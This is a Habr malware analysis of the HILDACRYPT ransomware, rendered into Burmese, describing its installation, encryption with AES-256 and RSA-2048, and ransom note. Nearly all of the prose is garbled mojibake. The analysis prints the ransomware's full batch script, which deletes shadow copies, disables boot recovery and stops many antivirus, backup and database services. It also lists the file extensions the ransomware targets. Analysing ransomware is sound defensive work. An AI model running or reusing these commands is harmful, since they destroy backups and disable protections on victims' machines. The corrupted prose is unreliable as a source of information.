áááºá¹ááá¬áá« Habrá áá áºáááºá áá»áœááºá¯ááºááá¯á·ááẠRansomware á¡áá»áá¯ážá¡á á¬ážá០áá±á¬ááºáá¯á¶ážááœáẠmalware áá¬ážááŸááºážáá»á¬ážá¡ááŒá±á¬ááºáž ááŒá±á¬áá±áá«áááºá HILDACRYPT ááẠ2019 áá¯ááŸá ẠááŒáá¯ááºáááœáẠááŸá¬ááœá±ááœá±á·ááŸááá²á·áá±á¬ Hilda áááá¬ážá á¯á០á¡ááœá²á·áááºáá áºáŠážááŒá áºááŒá®áž áá±á¬á·ááºáá²ááºááŒáá·áºáá±áááºá¡ááœáẠá¡áá¯á¶ážááŒá¯áá²á·áá±á¬ Netflix áá¬ááœááºážááᯠá¡á áœá²ááŒá¯á á¡áááºáá±ážáá¬ážááá·áº ransomware á¡áá áºááŒá áºáááºá ááá±á· áá»áœááºá¯ááºááá¯á·ááẠá€ááœááºážáá¶áá¬ážáá±á¬ ransomware ááá¯ááºážáááºá áºá áááºážááá¬ááá¯ááºáᬠá¡ááºá¹áá«áááºáá»á¬ážááŸáá·áº áááºážááŸá®ážáá¬áá«áááºá
Hilda ransomware áááááá¬ážááŸááºážááœáẠYoutube ááœááºáááºáá¬ážáá±á¬ááá·áºááºáá
áºáá¯
á¡ááŒáááºááá±
Ransomware ááẠMS Windows á¡ááœááºáá±ážáá¬ážáá±á¬ PE32 .NET ááá¯ááºááœááºáá«ááŸááááºá áááºážáá¡ááœááºá¡á á¬ážááŸá¬ 135 bytes ááŒá áºáááºá áááºááááá¯ááááºáá¯ááºááŸáá·áº áá±á¬ááºáá¶áááá¯ááááºáá¯ááºááŸá áºáá¯áá¯á¶ážááᯠC# ááŒáá·áº áá±ážáá¬ážáá¬ážáááºá á á¯áá±á¬ááºážááá·áºáááºá áœá²ááŸáá·áº á¡áá»áááºáá¶ááááºáá±á«ááºážá¡á ááœáá á¯á¶ááᯠá ááºáááºáᬠ168á 14 ááœáẠáááºáá®ážáá²á·áááºá
Detect It Easy á¡áá ransomware ááẠConfuser ááŸáá·áº ConfuserEx ááá¯á¡áá¯á¶ážááŒá¯á ááááºážáááºážáá¬ážáá±á¬áºáááºáž á¡ááá¯áá« obfuscator áá»á¬ážááẠááááºáá²á·ááá¯á·áááºááŒá
áºááŒá®áž ConfuserEx áá¬áá»áŸáẠConfuser ááááºáá¶áá°ááŒá
áºáá±á¬ááŒá±á¬áá·áº áááºážááá¯á·ááá¯ááºáááºááŸááºáá»á¬ážááẠáááºáá°áááºá
HILDACRYPT ááẠá¡ááŸááºááẠConfuserEx ááŒáá·áº áá¯ááºááá¯ážáá¬ážáááºá
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
ááá¯ááºááá¯ááºááŸá¯ á¡á¬ážáááºážáá»ááº
ááŒá áºááá¯ááºáá»á±á¡áá»á¬ážá á¯ááŸá¬á ransomware ááá¯ááá¬ážááẠXAMPP áááá¯ááááºáá áºáá¯á¡ááŒá Ạáááºáá±á¬ááºáá¬ážááá·áº áááºáááá¯ááááºážáááºážááá¯ááºáá áºáá¯ááœáẠááŸá¬ááœá±ááœá±á·ááŸááá²á·áááºá
áá±á¬áá«áá°ážá
ááºááŸá¯ ááœááºážáááºáá
áºáá¯áá¯á¶ážááᯠááœá±á·ááŒááºááá¯ááºáááºá
ááŸá¯ááºááœá±ážááŒááºáž
Ransomware ááŒáá¯ážáá»á¬ážááᯠáá¯ááºááŸááºáá¬ážáá±á¬áá¯á¶á á¶ááŒáá·áº ááááºážáááºážáá¬ážáááºá á áááºáá±á¬á¡áá«á HILDACRYPT ááẠBase64 ááŸáá·áº AES-256-CBC ááᯠá¡áá¯á¶ážááŒá¯á áááºážááá¯á·ááᯠá á¬ááŸááºáá±ážáááºá
ustanovka
ááááŠážá áœá¬á Ransomware ááẠGUID (Globally Unique Identifier) ââáá«áá¬áá®áá¬ááᯠáá»áááºážáá¯ááºáá±ážááá·áº %AppDataRoaming% ááœáẠááá¯ááºááœá²áá áºáá¯ááᯠáááºáá®ážáá±ážáááºá bat ááá¯ááºááᯠá€áá±áá¬ááá¯á· áá±á«ááºážááá·áºááŒááºážááŒáá·áºá ransomware ááá¯ááºážáááºá áºááẠcmd.exe ááᯠá¡áá¯á¶ážááŒá¯á áááºážááᯠá áááºááá¯ááºáááº-
cmd.exe /c JKfgkgj3hjgfhjka.bat & ááœááºáá«á
áááºážááẠá
áá
áºá¡ááºá¹áá«áááºáá»á¬áž ááá¯á·ááá¯áẠáááºáá±á¬ááºááŸá¯áá»á¬ážááᯠááááºááẠbatch script ááᯠá
áááºáá¯ááºáá±á¬ááºáááºá
Script ááœáẠá¡ááááºáááá¹áá°áá»á¬ážááᯠáá»ááºá
á®ážááŒááºážá SQL áá¬áá¬ááᯠááááºááŒááºážá á¡áááºááááºážááŒááºážááŸáá·áº ááá¯ááºážáááºá
áºááŸáááºáááºážáá±áž ááŒá±ááŸááºážáá»ááºáá»á¬ážá¡á¬áž áá»ááºáá
áºááá·áº ááŸááºáá»á¬ážáá±á¬ ááœáŸááºááŒá¬ážáá»ááºáá»á¬áž áá«ááŸááááºá
á¥ááá¬á¡á¬ážááŒáá·áºá Acronis Backup áááºáá±á¬ááºááŸá¯áá»á¬ážááᯠáááºááá·áºááẠááŒáá¯ážá á¬ážáá±á¬áºáááºáž áá¡á±á¬ááºááŒááºáá«á ááá¯á·á¡ááŒááºá áááºážááẠá¡á±á¬ááºáá«áá±á¬ááºážáá»áá°áá»á¬ážáá¶á០á¡áááºá áá áºáá»á¬ážááŸáá·áº ááá¯ááºážáááºá áºááŸáááºáááºážáá±ážááŒá±ááŸááºážáá»ááºáá»á¬ážááᯠááá¯ááºááá¯ááºáááº- Veeamá Sophosá Kasperskyá McAfee ááŸáá·áº á¡ááŒá¬ážá¡áá¬áá»á¬ážááᯠááá¯ááºááá¯ááºáááºá
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop âSophos Device Control Serviceâ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop âZoolz 2 Serviceâ /y
net stop McTaskManager /y
net stop âSophos AutoUpdate Serviceâ /y
net stop âSophos System Protection Serviceâ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop âSymantec System Recoveryâ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop âSophos Health Serviceâ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop âSophos Message Routerâ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop âSophos Clean Serviceâ /y
net stop swi_update_64 /y
net stop âSophos Web Control Serviceâ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop âVeeam Backup Catalog Data Serviceâ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop âSophos MCS Clientâ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop âSQLsafe Backup Serviceâ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop âSophos Safestore Serviceâ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop âSophos File Scanner Serviceâ /y
net stop âSophos Agentâ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop âEnterprise Client Serviceâ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop âSQL Backupsâ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop âSophos MCS Agentâ /y
net stop RESvc /y
net stop âAcronis VSS Providerâ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop âSQLsafe Filter Serviceâ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
á¡áááºáá±á¬áºááŒáá« áááºáá±á¬ááºááŸá¯áá»á¬ážááŸáá·áº áá¯ááºáááºážá
ááºáá»á¬ážááᯠááááºáá¬ážáááºááŸáá·áºáá
áºááŒáá¯ááºáááºá cryptolocker ááẠááá¯á¡ááºáá±á¬áááºáá±á¬ááºááŸá¯áá»á¬ážá¡á¬ážáá¯á¶ážááᯠáá»áááºážááœá¬ážááŒá±á¬ááºážáá±áá»á¬á
á±ááẠTasklist command ááᯠá¡áá¯á¶ážááŒá¯á áá¯ááºáá±á¬ááºáá±ááá·áº áá¯ááºáááºážá
ááºáá»á¬ážá¡á¬ážáá¯á¶ážá á¡áá»ááºá¡áááºáá»á¬ážááᯠá
á¯áá±á¬ááºážáá«áááºá
á¡áá¯ááºá
á¬áááºáž v/fo csv
ဠcommand ááẠâ,â áááºá¹áá±áááŒáá·áº ááá¯ááºážááŒá¬ážáá¬ážáá±á¬ á¡á
áááºá¡ááá¯ááºážáá»á¬ážááᯠáá¯ááºáá±á¬ááºáá±ááá·áº áá¯ááºáááºážá
ááºáá»á¬ážá á¡áá±ážá
áááºá
á¬áááºážááᯠááŒááááºá
««csrss.exe»,«448»,«services»,«0»,«1ᅵ896 ᅵᅵ»,«unknown»,»ᅵ/ᅵ»,«0:00:03»,»ᅵ/ᅵ»»
á€á
á
áºáá±ážááŸá¯ááŒá®ážáá±á¬ááºá ransomware ááẠáá¯ááºááŸááºááŒááºážáá¯ááºáááºážá
ááºááᯠá
áááºáááºá
á
á¬ááŸááºááŒááºáž
ááá¯ááºáá¯ááºááŸááºááŒááºáž
HILDACRYPT ááẠRecycle.Bin ááŸáá·áº Reference AssembliesMicrosoft ááá¯ááºááœá²áá»á¬ážááŸááœá²á áá¬á·ááºáááá¯ááºáá»á¬ážá ááœá±á·ááŸáááá»áŸ á¡ááŒá±á¬ááºážá¡áá¬á¡á¬ážáá¯á¶ážááᯠááŒááºáááºážáá«áááºá áá±á¬ááºááá¯ááºážááœáẠransomware ááááºáááºááŸá¯ááᯠááááá¯ááºá á±ááá¯ááºáá±á¬ .Net á¡ááá®áá±ážááŸááºážáá»á¬ážá¡ááœáẠá¡áá±ážááŒá®ážáá±á¬ dllá pdb á áááºááá¯á· ááá¯ááºáá»á¬ážáá«ááŸááááºá áá¯ááºááŸááºáá¬ážááá·áº ááá¯ááºáá»á¬ážááᯠááŸá¬ááœá±áááºá á¡á±á¬ááºáá« ááá¯ážáá»á²á·ááŸá¯áá»á¬áž á á¬áááºážááᯠá¡áá¯á¶ážááŒá¯áááº-
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
ransomware ááẠá¡áá¯á¶ážááŒá¯áá°ááá¯ááºáá»á¬ážááᯠá
á¬ááŸááºááẠAES-256-CBC algorithm ááá¯á¡áá¯á¶ážááŒá¯áááºá áá±á¬á·á¡ááœááºá¡á
á¬ážááŸá¬ 256 bits ááŒá
áºááŒá®áž á¡á
ááŒá¯ááŒááºáž vector (IV) á¡ááœááºá¡á
á¬ážááŸá¬ 16 bytes ááŒá
áºáááºá
á¡á±á¬ááºáá±á¬áºááŒáá« áááºáá¬ážááŒááºáá¬ááºáá¯á¶ááœááºá byte_2 ááŸáá·áº byte_1 ááá¯á·ááááºááá¯ážáá»á¬ážááᯠGetBytes() ááᯠá¡áá¯á¶ážááŒá¯á áá»áááºážááá°áá²á·áááºá
áá±á¬á·
IN AND
áá¯ááºááŸááºáá¬ážáá±á¬ááá¯ááºááœáẠá¡áááºá
áááºážááŸááºáž HCY!.. á€áááºááŸá¬ áá¯ááºááŸááºáá¬ážáá±á¬ ááá¯ááºáá
áºáá¯á á¥ááá¬áá
áºáá¯ááŒá
áºáááºá á¡áááºáá±á¬áºááŒáá«áá±á¬á·ááŸáá·áº IV ááᯠá€ááá¯ááºá¡ááœáẠáááºáá®ážáá¬ážáááºá
áá±á¬á·áá¯ááºááŸááºááŒááºáž
cryptolocker ááẠáá¯ááºáá¯ááºáá¬ážáá±á¬ AES áá±á¬á·ááᯠáá¯ááºááŸááºáá¬ážáá±á¬ááá¯ááºááœáẠááááºážáááºážáá¬ážáááºá áá¯ááºááŸááºáá¬ážáá±á¬ ááá¯ááºá áááá¡ááá¯ááºážááœáẠHILDACRYPTá KEYá IVá XML áá±á¬áºáááºááŸá FileLen áá²á·ááá¯á·áá±á¬ áá±áá¬áá»á¬áž áá«áááºáá±á¬ áá±á«ááºážá á®ážáá áºáᯠáá«ááŸáááŒá®áž á€áá²á·ááá¯á· ááœá±á·ááááº-
AES ááŸáá·áº IV áá±á¬á· áá¯ááºááŸááºááŒááºážááᯠRSA-2048 áá¯á¶ážááŒá®áž áá¯ááºáá±á¬ááºááŒá®áž Base64 ááᯠá¡áá¯á¶ážááŒá¯á áá¯ááºááœááºážááŒááºáž ááŒá¯áá¯ááºáá«áááºá RSA á¡áá»á¬ážáá°ááŸá¬áá±á¬á·ááᯠXML áá±á¬áºáááºááŒáá·áº áá¯ááºááŸááºáá¬ážáá±á¬ á
á¬ááŒá±á¬ááºážáá»á¬ážáá²á០áá
áºáá¯ááœáẠcryptolocker áááá¯ááºáááºááœáẠááááºážáááºážáá¬ážáááºá
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES ááá¯ááºáá®ážááᯠá á¬ááŸááºááẠRSA á¡áá»á¬ážáá°ááŸá¬áá®ážááᯠá¡áá¯á¶ážááŒá¯áááºá RSA á¡áá»á¬ážáá°ááŸá¬áá±á¬á·ááẠBase64 ááᯠáá¯ááºááŸááºáá¬ážááŒá®áž áá±á¬áºáááºáá áºáá¯ááŸáá·áº 65537 á á¡áá»á¬ážáá°ááŸá¬ áááºááááºážáá áºáᯠáá«áááºáá«áááºá áá¯ááºááŸááºááŒááºážááœáẠááá¯ááºááá¯ááºáá°ááœááºááŸááá±á¬ RSA áá®ážááá·áºáá±á¬á· ááá¯á¡ááºáááºá
RSA áá¯ááºááŸááºááŒááºážááŒá®ážáá±á¬ááºá AES áá±á¬á·ááᯠáá¯ááºááŸááºáá¬ážáá±á¬ááá¯ááºááœáẠááááºážáááºážáá¬ážáá±á¬ Base64 ááᯠá¡áá¯á¶ážááŒá¯á áá¯ááºáá¯ááºáá¬ážáááºá
ááœá±ážáá¯ááºá á¬
áá¯ááºááŸááºááŒááºáž ááŒá®ážáááºááŸáá·áºá HILDACRYPT ááẠááá¯ááºáá»á¬ážááᯠáá¯ááºááŸááºáá¬ážááá·áº ááá¯ááºááœá²ááá¯á· html ááá¯ááºááᯠáá±ážáááºá ransomware á¡ááŒá±á¬ááºážááŒá¬ážáá»ááºááœáẠáá¬ážáá±á¬ááºááẠááá¯ááºááá¯ááºáá°áᶠáááºááœááºááá¯ááºááá·áº á¡á®ážáá±ážááºááááºá ᬠááŸá áºáá¯áá«ááŸááááºá
- [á¡á®ážáá±ážááºááá¯áá¬ááœááºáá¬ážáááº]
[á¡á®ážáá±ážááºááá¯áá¬ááœááºáá¬ážáááº]
ááœá±ááŸá
áºááŸá¯ ááááá±ážáá»ááºááœáẠâNo loli is safe;)â áá°áá±á¬ á
á¬ááŒá±á¬ááºážáá«ááŸáááẠ- áá»áááºááœáẠáá¬ážááŒá
áºáá¬ážáá±á¬ ááááºážááá±ážáááºáá»á¬ážáá¡ááœááºá¡ááŒááºááŸáá·áº anime ááŸáá·áº manga áá¬ááºáá±á¬ááºáá»á¬ážááᯠáááºááœáŸááºážáááºá
áá±á¬ááºáá»ááº
Ransomware áááá¬ážá á¯á¡áá áºááŒá áºáá±á¬ HILDACRYPT ááẠáá¬ážááŸááºážá¡áá áºááᯠáá¯ááºááŒááºááá¯ááºááŒá®ááŒá áºáááºá áá¯ááºááŸááºááŒááºážáá¯á¶á á¶ááẠáá¬ážáá±á¬ááºá¡á¬áž ransomware á០á á¬ááŸááºáá¬ážáá±á¬ ááá¯ááºáá»á¬ážááᯠáá¯ááºááŸááºááŒááºážá០áá¬ážáá®ážáá±ážáááºá Cryptolocker ááẠá¡áááºá áá áºáá»á¬ážááŸáá·áº ááá¯ááºážáááºá áºááŸáááºáááºážáá±ážááŒá±ááŸááºážáá»ááºáá»á¬ážááŸáá·áº áááºááá¯ááºááá·áº áá¬ááœááºááŸá¯áááºáá±á¬ááºááŸá¯áá»á¬ážááᯠááááºááẠáááºááŒáœáá±á¬áá¬ááœááºááŸá¯áááºážáááºážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áááºá HILDACRYPT ááá±ážáá¬ážáá°ááẠNetflix ááœááºááŒááá¬ážááá·áº áá¬ááœááºážá á®ážáá®áž Hilda ááááááºáááºáá áºáŠážááŒá áºááŒá®ážá áááá¯ááááºáááááºáá¬ážááŸááºážá¡ááœááºáááºáá¬ážáá±á¬á á¬ááœááºáá«ááŸááá±á¬ááá°áá¬áááá·áºááºááŒá áºáááºá
áá¯á¶ážá
á¶á¡ááá¯ááºáž,
á¡áá±ážá¡áá°á¡ááœáŸááºážáá»á¬áž
ááá¯ááºááá¯ážáá»á²á·ááŸá¯ HCYá
HILDACRYPTreadMe.html
"p" á
á¬áá¯á¶ážáá
áºáá¯á¶ážáá«ááŸááá±á¬ xamp.exe ááŸáá·áº áá
áºáá»á
áºáááºáááºááŸááºáááŸááá«á
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
source: www.habr.com